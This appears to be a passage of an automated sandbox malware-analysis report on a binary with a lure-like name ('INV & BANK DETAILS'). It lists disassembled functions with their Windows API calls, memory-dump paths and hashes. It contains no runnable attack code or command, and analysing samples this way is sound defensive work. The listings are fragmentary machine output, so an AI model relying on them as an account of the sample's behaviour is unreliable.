                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: Window$Enable$Show$FocusMessageSend
                                • String ID:
                                • API String ID: 3429747543-0
                                • Opcode ID: 611a307e80107d343a79f7fc2cfd1bfbec1158008c6b2b7743f92638a6db6fc0
                                • Instruction ID: 6f3afe48a64986b2df7f4b22be5166ca64fe0b5af1f2aee4406df3dc20f3ce1d
                                • Opcode Fuzzy Hash: 611a307e80107d343a79f7fc2cfd1bfbec1158008c6b2b7743f92638a6db6fc0
                                • Instruction Fuzzy Hash: F331C4706043805BF7248F24CCC8BAFB7D4FB95305F08491EF581A6291DBBCA845CB59
                                APIs
                                  • Part of subcall function 00401B80: _wcsncpy.LIBCMT ref: 00401C41
                                  • Part of subcall function 00401B80: _wcscpy.LIBCMT ref: 00401C5D
                                  • Part of subcall function 00401B80: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401C6F
                                • KillTimer.USER32(?,?,?,?,?), ref: 004012D3
                                • SetTimer.USER32(?,?,000002EE,00000000), ref: 004012E2
                                • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 0042730F
                                • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 00427363
                                • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 004273AE
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: IconNotifyShell_$Timer$Kill_wcscpy_wcsncpy
                                • String ID:
                                • API String ID: 3300667738-0
                                • Opcode ID: 98bdb4639f13a2aff9c284aaa5c14a4e0db979becac89074174bb9299657736d
                                • Instruction ID: ad6fff92b80ef16b1053521cf30c66606da497e43c90b6e238f917110e524b22
                                • Opcode Fuzzy Hash: 98bdb4639f13a2aff9c284aaa5c14a4e0db979becac89074174bb9299657736d
                                • Instruction Fuzzy Hash: AF31EA70604259BFDB16CB24DC55BEAFBBCBB02304F0000EAF58CA3291C7741A95CB9A
                                APIs
                                • SetErrorMode.KERNEL32(00000001), ref: 0045D459
                                • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D4CF
                                • __swprintf.LIBCMT ref: 0045D4E9
                                • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D52D
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: ErrorMode$InformationVolume__swprintf
                                • String ID: %lu$\VH
                                • API String ID: 3164766367-2432546070
                                • Opcode ID: 886de82fe176795aba7bdb97f378ec25336d41d961a023bcb5d27bbb6add7ed5
                                • Instruction ID: a5bcfc38f1a54d16d783223dfbe865d4bc924dff4e6617147b97584b2165572c
                                • Opcode Fuzzy Hash: 886de82fe176795aba7bdb97f378ec25336d41d961a023bcb5d27bbb6add7ed5
                                • Instruction Fuzzy Hash: 11317171A00209AFCB14EF95DD85EAEB7B8FF48304F1084AAF905A7291D774EA45CB94
                                APIs
                                • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00450BE7
                                • SendMessageW.USER32(00000000,00000409,00000000,FF000000), ref: 00450BF8
                                • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00450C06
                                • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00450C17
                                • SendMessageW.USER32(00000000,00000404,00000001,00000000), ref: 00450C25
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: MessageSend
                                • String ID: Msctls_Progress32
                                • API String ID: 3850602802-3636473452
                                • Opcode ID: bde72abdda352e35c3e71b9276821fa19048fea6f3879b5342d5f34549d04d22
                                • Instruction ID: 3e9a69ee1b5e3cb2ffa50bc712587bba9ef5757239c838e11c91c46d95a842ac
                                • Opcode Fuzzy Hash: bde72abdda352e35c3e71b9276821fa19048fea6f3879b5342d5f34549d04d22
                                • Instruction Fuzzy Hash: 7A21667135030477EB20DEA9DC82F97B3AD9F94B24F21460AFB54A72D1C5B5F8418B58
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: Destroy$DeleteImageList_ObjectWindow$Icon
                                • String ID:
                                • API String ID: 3985565216-0
                                • Opcode ID: 49ccd75876ce99cd15ee405d1ac93d8c116bb45471ccb95599c5d22b34275644
                                • Instruction ID: 510e71718d61fb01ae158a6e5fa7ad280301b7661e5b3aef53c80a3471921dd4
                                • Opcode Fuzzy Hash: 49ccd75876ce99cd15ee405d1ac93d8c116bb45471ccb95599c5d22b34275644
                                • Instruction Fuzzy Hash: 70217E70200A00EFCB20DF25D9D4A2A77AABF48712F10896DE906CB356D739EC45CB69
                                APIs
                                • _malloc.LIBCMT ref: 0041F707
                                  • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                  • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                  • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                • _free.LIBCMT ref: 0041F71A
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: AllocateHeap_free_malloc
                                • String ID: [B
                                • API String ID: 1020059152-632041663
                                • Opcode ID: 5ae3695c4899d33c0c5016eec090c96391fe5f6cd2bec6778d3ea2d81492c429
                                • Instruction ID: 066e14217b5799beb7557260d36092b09813ce611e9d099bbd870b86b34de80c
                                • Opcode Fuzzy Hash: 5ae3695c4899d33c0c5016eec090c96391fe5f6cd2bec6778d3ea2d81492c429
                                • Instruction Fuzzy Hash: 0211EB32454615AACB213F75EC086DB3BA49F443A5B20053BF824CA2D1DB7C88C7C7AC
                                APIs
                                • ___set_flsgetvalue.LIBCMT ref: 00413DA4
                                • __calloc_crt.LIBCMT ref: 00413DB0
                                • __getptd.LIBCMT ref: 00413DBD
                                • CreateThread.KERNEL32(?,?,00413D1A,00000000,?,?), ref: 00413DF4
                                • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00413DFE
                                • _free.LIBCMT ref: 00413E07
                                • __dosmaperr.LIBCMT ref: 00413E12
                                  • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                                • String ID:
                                • API String ID: 155776804-0
                                • Opcode ID: 2348856d60b5f8ae92a3c52096df9563f03509e61ea6f3f8618797eae5d9925f
                                • Instruction ID: a8fa495ec3ad1bcc0d525816251f0ff308f4c172cb7463a6c3574dd724ca7d0d
                                • Opcode Fuzzy Hash: 2348856d60b5f8ae92a3c52096df9563f03509e61ea6f3f8618797eae5d9925f
                                • Instruction Fuzzy Hash: 8E11E9321087066FD7107FA6DC459DB3BE8DF04775B20042FF91586292DB79D99186AC
                                APIs
                                  • Part of subcall function 00436B19: GetProcessHeap.KERNEL32(00000008,0000000C,00436C79), ref: 00436B1D
                                  • Part of subcall function 00436B19: HeapAlloc.KERNEL32(00000000), ref: 00436B24
                                • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 00436C88
                                • GetCurrentProcess.KERNEL32(?,00000000), ref: 00436C91
                                • DuplicateHandle.KERNEL32(00000000,?,00000000), ref: 00436C9A
                                • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00000000), ref: 00436CA6
                                • GetCurrentProcess.KERNEL32(?,00000000,?,00000000), ref: 00436CAF
                                • DuplicateHandle.KERNEL32(00000000,?,00000000,?,00000000), ref: 00436CB2
                                • CreateThread.KERNEL32(00000000,00000000,Function_00036C2B,00000000,00000000,00000000), ref: 00436CCA
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                • String ID:
                                • API String ID: 1957940570-0
                                • Opcode ID: 3f80535c3287afe012eec8eac85a3d96c91e040866ec74b6355b9bdb3dfb6838
                                • Instruction ID: 99b39fe8e7f3ac854e5c8e3994335d5d6f6ef2f737fc2b72a46a077924210789
                                • Opcode Fuzzy Hash: 3f80535c3287afe012eec8eac85a3d96c91e040866ec74b6355b9bdb3dfb6838
                                • Instruction Fuzzy Hash: A301E6753403047BD620EB65DC96F5B775CEB89B50F114819FA04DB1D1C6B5E8008B78
                                APIs
                                • GetClientRect.USER32(?,?), ref: 004302E6
                                • GetWindowRect.USER32(00000000,?), ref: 00430316
                                • GetClientRect.USER32(?,?), ref: 00430364
                                • GetSystemMetrics.USER32(0000000F), ref: 004303B1
                                • GetWindowRect.USER32(?,?), ref: 004303C3
                                • ScreenToClient.USER32(?,?), ref: 004303EC
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: Rect$Client$Window$MetricsScreenSystem
                                • String ID:
                                • API String ID: 3220332590-0
                                • Opcode ID: b722cec4de1de3fe17d9867fbb91cd497d3f089f761d48fb585960e999a4a017
                                • Instruction ID: e4235e81f7515d2978e088f6fadb01cec8eb5fe04dcc4a3bbd5a83ea815e8f28
                                • Opcode Fuzzy Hash: b722cec4de1de3fe17d9867fbb91cd497d3f089f761d48fb585960e999a4a017
                                • Instruction Fuzzy Hash: 13A14875A0070A9BCB10CFA8C594BEFB7B1FF58314F00961AE9A9E7350E734AA44CB54
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: _memmove_strncmp
                                • String ID: >$U$\
                                • API String ID: 2666721431-237099441
                                • Opcode ID: 22f22e1ac28dc69493aec85f3eea1e1d82883446f00fc80900d5fd24c0790888
                                • Instruction ID: 902f5a6c35c0d49260658601fd29bdf8c292b60929ab84f6d376942388b5a00c
                                • Opcode Fuzzy Hash: 22f22e1ac28dc69493aec85f3eea1e1d82883446f00fc80900d5fd24c0790888
                                • Instruction Fuzzy Hash: 8DF1B170A00249CFEB14CFA9C8906AEFBF1FF89304F2485AED845A7341D779A946CB55
                                APIs
                                • GetKeyboardState.USER32(?), ref: 0044C570
                                • SetKeyboardState.USER32(00000080), ref: 0044C594
                                • PostMessageW.USER32(?,00000100,?,?), ref: 0044C5D5
                                • PostMessageW.USER32(?,00000104,?,?), ref: 0044C60D
                                • PostMessageW.USER32(?,00000102,?,00000001), ref: 0044C62F
                                • SendInput.USER32(00000001,?,0000001C), ref: 0044C6C2
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: MessagePost$KeyboardState$InputSend
                                • String ID:
                                • API String ID: 2221674350-0
                                • Opcode ID: 253f2b6e14f8b29283c151e9eff2603b50f4fedb3541a599f467ca45a100d6c4
                                • Instruction ID: 625ea0eb49cc588760ebb6bc0eb208289033378f73eea84c13a2ca11a8b118cf
                                • Opcode Fuzzy Hash: 253f2b6e14f8b29283c151e9eff2603b50f4fedb3541a599f467ca45a100d6c4
                                • Instruction Fuzzy Hash: D1514A725001187AEB109FA99C81BFFBB68AF9E311F44815BFD8496242C379D941CBA8
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: _wcscpy$_wcscat
                                • String ID:
                                • API String ID: 2037614760-0
                                • Opcode ID: cc5f24ba9fb77c1fb1fe1c0710fcc73dec9ab40ad7bfe8f9893d0625b32ee804
                                • Instruction ID: 99b1098f8f7a3a84d55f117cb3556dd5d93458401dda30520ad7f1c57b96c0d6
                                • Opcode Fuzzy Hash: cc5f24ba9fb77c1fb1fe1c0710fcc73dec9ab40ad7bfe8f9893d0625b32ee804
                                • Instruction Fuzzy Hash: 0741357190011466DB34EF5998C1BFF7368EFE6314F84455FFC4287212DB2DAA92C2A9
                                APIs
                                • GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                • VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                                • VariantCopy.OLEAUT32(-00000068,?), ref: 00451C0E
                                • VariantCopy.OLEAUT32(-00000088,?), ref: 00451C27
                                • VariantClear.OLEAUT32(-00000058), ref: 00451CA1
                                • SysAllocString.OLEAUT32(00000000), ref: 00451CBA
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: Variant$Copy$AllocClearErrorLastString
                                • String ID:
                                • API String ID: 960795272-0
                                • Opcode ID: 218b2f6110521206867dfa84a42cd28f2b67ec3390fd0729a790b06cd777bcc7
                                • Instruction ID: e234943060a9aef7ccdf580943a4f321f6ba3cfb1df2bc58669f78ff50eabc4c
                                • Opcode Fuzzy Hash: 218b2f6110521206867dfa84a42cd28f2b67ec3390fd0729a790b06cd777bcc7
                                • Instruction Fuzzy Hash: C751AE719042099FCB14DF65CC84BAAB7B4FF48300F14856EED05A7361DB79AE45CBA8
                                APIs
                                • BeginPaint.USER32(00000000,?), ref: 00447BDF
                                • GetWindowRect.USER32(?,?), ref: 00447C5D
                                • ScreenToClient.USER32(?,?), ref: 00447C7B
                                • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C8E
                                • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447CD5
                                • EndPaint.USER32(?,?), ref: 00447D13
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: Paint$BeginClientRectRectangleScreenViewportWindow
                                • String ID:
                                • API String ID: 4189319755-0
                                • Opcode ID: 0de1757924998e3fd5473b1ac31060e8ba53e31114793872216692834f921a18
                                • Instruction ID: 4e3fb435071a661ad846631c1082d1486cc319c76cae6976ccfd06e2d512f03c
                                • Opcode Fuzzy Hash: 0de1757924998e3fd5473b1ac31060e8ba53e31114793872216692834f921a18
                                • Instruction Fuzzy Hash: DC417F706042019FE310DF14D8C4F7B7BA8EB86724F14466EF9A487391CB74A806CB69
                                APIs
                                • SendMessageW.USER32(?,00001024,00000000,00000000), ref: 0044908B
                                • SendMessageW.USER32(?,00000409,00000000,?), ref: 0044909F
                                • SendMessageW.USER32(?,0000111E,00000000,00000000), ref: 004490B3
                                • InvalidateRect.USER32(?,00000000,00000001,?,0000111E,00000000,00000000,?,00000409,00000000,?), ref: 004490C9
                                • GetWindowLongW.USER32(?,000000F0), ref: 004490D4
                                • SetWindowLongW.USER32(?,000000F0,00000000), ref: 004490E1
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: MessageSend$LongWindow$InvalidateRect
                                • String ID:
                                • API String ID: 1976402638-0
                                • Opcode ID: 2001084b9f030ce18b996af9061ac6ceee4bb7592284355317d8a12df4a6bddd
                                • Instruction ID: 8674d855734444f977eaeabaa32478bd653fbe911923e0a4a3d3eb28cec46bd0
                                • Opcode Fuzzy Hash: 2001084b9f030ce18b996af9061ac6ceee4bb7592284355317d8a12df4a6bddd
                                • Instruction Fuzzy Hash: 2531E135240104AFF724CF48DC89FBB77B9EB49320F10851AFA559B290CA79AD41DB69
                                APIs
                                • ShowWindow.USER32(?,00000000), ref: 00440A8A
                                • EnableWindow.USER32(?,00000000), ref: 00440AAF
                                • ShowWindow.USER32(?,00000000), ref: 00440B18
                                • ShowWindow.USER32(?,00000004), ref: 00440B2B
                                • EnableWindow.USER32(?,00000001), ref: 00440B50
                                • SendMessageW.USER32(?,0000130C,?,00000000), ref: 00440B75
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: Window$Show$Enable$MessageSend
                                • String ID:
                                • API String ID: 642888154-0
